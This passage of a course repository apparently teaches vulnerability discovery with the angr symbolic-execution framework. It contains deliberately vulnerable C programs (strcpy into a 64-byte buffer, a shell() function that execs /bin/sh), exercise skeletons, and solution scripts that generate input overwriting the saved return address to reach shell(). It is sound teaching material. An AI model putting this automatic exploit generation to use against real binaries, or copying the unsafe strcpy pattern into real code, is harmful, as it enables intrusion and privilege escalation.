simgr.vuln: 42 | # step the simgr 43 | pass 44 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 45 | pass 46 | 47 | # now synthesize our crashing input 48 | pass 49 | open("crashing_input", "w").write(crashing_input) 50 | print "You can crash the program by doing:" 51 | print "# cat crashing_input | ./overflow" 52 | -------------------------------------------------------------------------------- /vuln_discovery/vuln.solution.py: -------------------------------------------------------------------------------- 1 | import angr 2 | 3 | # load the binary 4 | project = angr.Project("overflow", load_options={ 'auto_load_libs': False }) 5 | 6 | # Make a simple security checker that checks for an overflow into the return address. There are several cases: 7 | # 8 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 9 | # 2. The return address is unchanged and pointing inside the program (normal case) 10 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this) 11 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 12 | def state_vuln_filter(state): 13 | # get the saved instruction pointer from the stack 14 | saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE") 15 | print "Checking saved EIP:", saved_eip 16 | 17 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 18 | if project.is_hooked(state.se.any_int(saved_eip)): 19 | return False 20 | 21 | # next, create constraints representing an unsafe condition. In this case, 22 | # let's check if the return address can point *outside* of the program. 23 | unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ] 24 | 25 | # check if the state is satisfiable with these conditions, and return True if it is 26 | return state.se.satisfiable(extra_constraints=unsafe_constraints) 27 | 28 | # get a new simulation manager from the project factory 29 | simgr = project.factory.simgr() 30 | 31 | # initiate a "vuln" stash 32 | simgr.stashes['vuln'] = [ ] 33 | 34 | # the starting state has no return address on the stack, so it will trigger our vuln filter. 35 | # We can step it until it no longer triggers the filter before starting the actual analysis. 36 | print "Initializing initial state..." 37 | while state_vuln_filter(simgr.active[0]): 38 | simgr.step() 39 | 40 | # Now that we are all set up, let's loop until a vulnerable state has been found 41 | print "Searching for the vulnerability!" 42 | while not simgr.vuln: 43 | # step the simgr 44 | simgr.step() 45 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 46 | simgr.move('active', 'vuln', filter_func=state_vuln_filter) 47 | 48 | # now synthesize our crashing input 49 | crashing_input = simgr.vuln[0].state.posix.dumps(0) 50 | open("crashing_input", "w").write(crashing_input) 51 | print "You can crash the program by doing:" 52 | print "# cat crashing_input | ./overflow" 53 | -------------------------------------------------------------------------------- /vuln_discovery_2/overflow3-28d8a442fb232c0c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery_2/overflow3-28d8a442fb232c0c -------------------------------------------------------------------------------- /vuln_discovery_2/overflow3-28d8a442fb232c0c.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "dump_stack.h" 6 | 7 | /* 8 | * Goal: Get the program to run this function. 9 | */ 10 | void shell(void) { 11 | execl("/bin/sh", "sh", NULL); 12 | } 13 | 14 | void vuln(char *str) { 15 | char buf[64]; 16 | strcpy(buf, str); 17 | dump_stack((void **) buf, 21, (void **) &str); 18 | } 19 | 20 | int main(int argc, char **argv) { 21 | if (argc != 2) { 22 | printf("Usage: buffer_overflow [str]\n"); 23 | return 1; 24 | } 25 | 26 | uid_t euid = geteuid(); 27 | setresuid(euid, euid, euid); 28 | printf("shell function = %p\n", shell); 29 | vuln(argv[1]); 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /vuln_discovery_2/overflow3.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import claripy 3 | 4 | # load the binary, but the original one this time! 5 | project = angr.Project("overflow3-28d8a442fb232c0c", load_options={ 'auto_load_libs': False }) 6 | 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example). 8 | # Let's generate a CFG to fill in the knowledgebase. 9 | cfg = project.analyses.CFG() 10 | 11 | # This binary has some functionality that gives angr trouble. Specifically, the way it uses printf (printing pointers) 12 | # in both main() and dump_stack() is not properly handled by angr's printf SimProcedure. If you try to run this 13 | # code without compensating for that, it will hang (because it will error on all states and keep looping while looking 14 | # for a vuln state). So, to compensate for that, we override printf with a simprocedure that does nothing. 15 | pass 16 | 17 | # Make a simple security checker that checks for an overflow into the return address. There are several cases: 18 | # 19 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 20 | # 2. The return address is unchanged and pointing inside the program (normal case) 21 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this) 22 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 23 | def state_vuln_filter(state): 24 | # get the saved instruction pointer from the stack 25 | saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE") 26 | print "Checking saved EIP:", saved_eip 27 | 28 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 29 | if project.is_hooked(state.se.any_int(saved_eip)): 30 | return False 31 | 32 | # next, create constraints representing an unsafe condition. In this case, 33 | # let's check if the return address can point *outside* of the program. 34 | unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ] 35 | 36 | # check if the state is satisfiable with these conditions, and return True if it is 37 | return state.se.satisfiable(extra_constraints=unsafe_constraints) 38 | 39 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must: 40 | # first, create a symbolic bitvector representing the argument. 41 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a 42 | # concatination of 60 concrete bytes and 60 symbolic bytes. 43 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240)) 44 | # next, create a state with this argument 45 | state = project.factory.entry_state(args=['overflow3', arg]) 46 | # now, create the simulation manager with that state as the initial state 47 | simgr = project.factory.simgr(state) 48 | 49 | # initiate a "vuln" stash 50 | simgr.stashes['vuln'] = [ ] 51 | 52 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure. 53 | print "Initializing initial state..." 54 | while simgr.active[0].addr != project.kb.functions['main'].addr: 55 | simgr.step() 56 | 57 | # Now that we are all set up, let's loop until a vulnerable state has been found 58 | print "Searching for the vulnerability!" 59 | while not simgr.vuln: 60 | # step the simgr 61 | simgr.step() 62 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 63 | simgr.move('active', 'vuln', filter_func=state_vuln_filter) 64 | 65 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function. 66 | # First, grab the stored return address in the vuln state 67 | print "Constraining saved return address!" 68 | vuln_state = simgr.vuln[0] 69 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE") 70 | print "Overwritten EIP:", overwritten_eip 71 | # Now, let's add a constraint to redirect that return address to the shell function 72 | addr_of_shell = project.kb.functions['shell'].addr 73 | vuln_state.add_constraints(overwritten_eip == addr_of_shell) 74 | 75 | # and now let's explore the vuln stash until we reach the shell 76 | print "Exploring to 'shell' function." 77 | simgr.explore(stash='vuln', find=addr_of_shell) 78 | 79 | # now synthesize our pwning input! 80 | pwning_input = simgr.found[0].state.se.any_str(arg) 81 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte 82 | print "You can crash the program by doing:" 83 | print '# ./overflow3-28d8a442fb232c0c "$(cat pwning_input)"' 84 | -------------------------------------------------------------------------------- /vuln_discovery_2/overflow3.solution.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import claripy 3 | 4 | # load the binary, but the original one this time! 5 | project = angr.Project("overflow3-28d8a442fb232c0c", load_options={ 'auto_load_libs': False }) 6 | 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example). 8 | # Let's generate a CFG to fill in the knowledgebase. 9 | cfg = project.analyses.CFG() 10 | 11 | # This binary has some functionality that gives angr trouble. Specifically, the way it uses printf (printing pointers) 12 | # in both main() and dump_stack() is not properly handled by angr's printf SimProcedure. If you try to run this 13 | # code without compensating for that, it will hang (because it will error on all states and keep looping while looking 14 | # for a vuln state). So, to compensate for that, we override printf with a simprocedure that does nothing. 15 | class DoNothing(angr.SimProcedure): 16 | def run(self): 17 | return 18 | 19 | project.hook(project.kb.functions['printf'].addr, DoNothing) 20 | project.hook(project.kb.functions['dump_stack'].addr, DoNothing) 21 | 22 | # Make a simple security checker that checks for an overflow into the return address. There are several cases: 23 | # 24 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 25 | # 2. The return address is unchanged and pointing inside the program (normal case) 26 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this) 27 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 28 | def state_vuln_filter(state): 29 | # get the saved instruction pointer from the stack 30 | saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE") 31 | print "Checking saved EIP:", saved_eip 32 | 33 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 34 | if project.is_hooked(state.se.any_int(saved_eip)): 35 | return False 36 | 37 | # next, create constraints representing an unsafe condition. In this case, 38 | # let's check if the return address can point *outside* of the program. 39 | unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ] 40 | 41 | # check if the state is satisfiable with these conditions, and return True if it is 42 | return state.se.satisfiable(extra_constraints=unsafe_constraints) 43 | 44 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must: 45 | # first, create a symbolic bitvector representing the argument. 46 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a 47 | # concatination of 60 concrete bytes and 60 symbolic bytes. 48 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240)) 49 | # next, create a state with this argument 50 | state = project.factory.entry_state(args=['overflow3', arg]) 51 | # now, create the simulation manager with that state as the initial state 52 | simgr = project.factory.simgr(state) 53 | 54 | # initiate a "vuln" stash 55 | simgr.stashes['vuln'] = [ ] 56 | 57 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure. 58 | print "Initializing initial state..." 59 | while simgr.active[0].addr != project.kb.functions['main'].addr: 60 | simgr.step() 61 | 62 | # Now that we are all set up, let's loop until a vulnerable state has been found 63 | print "Searching for the vulnerability!" 64 | while not simgr.vuln: 65 | # step the simgr 66 | simgr.step() 67 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 68 | simgr.move('active', 'vuln', filter_func=state_vuln_filter) 69 | 70 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function. 71 | # First, grab the stored return address in the vuln state 72 | print "Constraining saved return address!" 73 | vuln_state = simgr.vuln[0] 74 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE") 75 | print "Overwritten EIP:", overwritten_eip 76 | # Now, let's add a constraint to redirect that return address to the shell function 77 | addr_of_shell = project.kb.functions['shell'].addr 78 | vuln_state.add_constraints(overwritten_eip == addr_of_shell) 79 | 80 | # and now let's explore the vuln stash until we reach the shell 81 | print "Exploring to 'shell' function." 82 | simgr.explore(stash='vuln', find=addr_of_shell) 83 | 84 | # now synthesize our pwning input! 85 | pwning_input = simgr.found[0].state.se.any_str(arg) 86 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte 87 | print "You can crash the program by doing:" 88 | print '# ./overflow3-28d8a442fb232c0c "$(cat pwning_input)"' 89 | -------------------------------------------------------------------------------- /vuln_discovery_simple/overflow3-simplified: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery_simple/overflow3-simplified -------------------------------------------------------------------------------- /vuln_discovery_simple/overflow3-simplified.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | //#include "dump_stack.h" 6 | 7 | /* 8 | * Goal: Get the program to run this function. 9 | */ 10 | void shell(void) { 11 | execl("/bin/sh", "sh", NULL); 12 | } 13 | 14 | void vuln(char *str) { 15 | char buf[64]; 16 | strcpy(buf, str); 17 | //dump_stack((void **) buf, 21, (void **) &str); 18 | } 19 | 20 | int main(int argc, char **argv) { 21 | if (argc != 2) { 22 | printf("Usage: buffer_overflow [str]\n"); 23 | return 1; 24 | } 25 | 26 | //uid_t euid = geteuid(); 27 | //setresuid(euid, euid, euid); 28 | //printf("shell function = %p\n", shell); 29 | vuln(argv[1]); 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /vuln_discovery_simple/overflow3.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import claripy 3 | 4 | # load the binary 5 | project = angr.Project("overflow3-simplified", load_options={ 'auto_load_libs': False }) 6 | 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example). 8 | # Let's generate a CFG to fill in the knowledgebase. 9 | pass 10 | 11 | # Make a simple security checker that checks for an overflow into the return address. There are several cases: 12 | # 13 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 14 | # 2. The return address is unchanged and pointing inside the program (normal case) 15 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this) 16 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 17 | def state_vuln_filter(state): 18 | # get the saved instruction pointer from the stack 19 | saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE") 20 | print "Checking saved EIP:", saved_eip 21 | 22 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 23 | if project.is_hooked(state.se.any_int(saved_eip)): 24 | return False 25 | 26 | # next, create constraints representing an unsafe condition. In this case, 27 | # let's check if the return address can point *outside* of the program. 28 | unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ] 29 | 30 | # check if the state is satisfiable with these conditions, and return True if it is 31 | return state.se.satisfiable(extra_constraints=unsafe_constraints) 32 | 33 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must: 34 | # first, create a symbolic bitvector representing the argument. 35 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a 36 | # concatination of 60 concrete bytes and 60 symbolic bytes. 37 | pass 38 | # next, create a state with this argument 39 | pass 40 | # now, create the simulation manager with that state as the initial state 41 | simgr = project.factory.simgr(state) 42 | 43 | # initiate a "vuln" stash 44 | simgr.stashes['vuln'] = [ ] 45 | 46 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure. 47 | print "Initializing initial state..." 48 | while simgr.active[0].addr != project.kb.functions['main'].addr: 49 | simgr.step() 50 | 51 | # Now that we are all set up, let's loop until a vulnerable state has been found 52 | print "Searching for the vulnerability!" 53 | while not simgr.vuln: 54 | # step the simgr 55 | simgr.step() 56 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 57 | simgr.move('active', 'vuln', filter_func=state_vuln_filter) 58 | 59 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function. 60 | # First, grab the stored return address in the vuln state 61 | print "Constraining saved return address!" 62 | vuln_state = simgr.vuln[0] 63 | pass 64 | print "Overwritten EIP:", overwritten_eip 65 | # Now, let's add a constraint to redirect that return address to the shell function 66 | addr_of_shell = project.kb.functions['shell'].addr 67 | pass 68 | 69 | # and now let's explore the vuln stash until we reach the shell 70 | print "Exploring to 'shell' function." 71 | pass 72 | 73 | # now synthesize our pwning input! 74 | pass 75 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte 76 | print "You can crash the program by doing:" 77 | print '# ./overflow3-simplified "$(cat pwning_input)"' 78 | -------------------------------------------------------------------------------- /vuln_discovery_simple/overflow3.solution.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import claripy 3 | 4 | # load the binary 5 | project = angr.Project("overflow3-simplified", load_options={ 'auto_load_libs': False }) 6 | 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example). 8 | # Let's generate a CFG to fill in the knowledgebase. 9 | cfg = project.analyses.CFG() 10 | 11 | # Make a simple security checker that checks for an overflow into the return address. There are several cases: 12 | # 13 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 14 | # 2. The return address is unchanged and pointing inside the program (normal case) 15 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this) 16 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 17 | def state_vuln_filter(state): 18 | # get the saved instruction pointer from the stack 19 | saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE") 20 | print "Checking saved EIP:", saved_eip 21 | 22 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 23 | if project.is_hooked(state.se.any_int(saved_eip)): 24 | return False 25 | 26 | # next, create constraints representing an unsafe condition. In this case, 27 | # let's check if the return address can point *outside* of the program. 28 | unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ] 29 | 30 | # check if the state is satisfiable with these conditions, and return True if it is 31 | return state.se.satisfiable(extra_constraints=unsafe_constraints) 32 | 33 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must: 34 | # first, create a symbolic bitvector representing the argument. 35 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a 36 | # concatination of 60 concrete bytes and 60 symbolic bytes. 37 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240)) 38 | # next, create a state with this argument 39 | state = project.factory.entry_state(args=['overflow3', arg]) 40 | # now, create the simulation manager with that state as the initial state 41 | simgr = project.factory.simgr(state) 42 | 43 | # initiate a "vuln" stash 44 | simgr.stashes['vuln'] = [ ] 45 | 46 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure. 47 | print "Initializing initial state..." 48 | while simgr.active[0].addr != project.kb.functions['main'].addr: 49 | simgr.step() 50 | 51 | # Now that we are all set up, let's loop until a vulnerable state has been found 52 | print "Searching for the vulnerability!" 53 | while not simgr.vuln: 54 | # step the simgr 55 | simgr.step() 56 | # after each step, move all states matching our vuln filter from the active stash to the vuln stash 57 | simgr.move('active', 'vuln', filter_func=state_vuln_filter) 58 | 59 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function. 60 | # First, grab the stored return address in the vuln state 61 | print "Constraining saved return address!" 62 | vuln_state = simgr.vuln[0] 63 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE") 64 | print "Overwritten EIP:", overwritten_eip 65 | # Now, let's add a constraint to redirect that return address to the shell function 66 | addr_of_shell = project.kb.functions['shell'].addr 67 | vuln_state.add_constraints(overwritten_eip == addr_of_shell) 68 | 69 | # and now let's explore the vuln stash until we reach the shell 70 | print "Exploring to 'shell' function." 71 | simgr.explore(stash='vuln', find=addr_of_shell) 72 | 73 | # now synthesize our pwning input! 74 | pwning_input = simgr.found[0].se.any_str(arg) 75 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte 76 | print "You can crash the program by doing:" 77 | print '# ./overflow3-simplified "$(cat pwning_input)"' 78 | --------------------------------------------------------------------------------